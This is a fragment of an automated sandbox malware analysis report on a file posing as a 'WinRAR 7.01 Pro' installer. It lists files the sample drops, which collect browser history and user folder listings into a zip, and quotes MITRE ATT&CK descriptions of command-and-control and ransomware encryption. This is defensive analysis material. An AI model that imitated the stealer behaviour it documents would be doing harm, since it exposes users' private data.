World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH.zip

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Browsers\Firefox\History.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Browsers\Google\History.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Pictures.txt

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Startup.txt

Windows Analysis Report
WinRAR 7.01 Pro.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre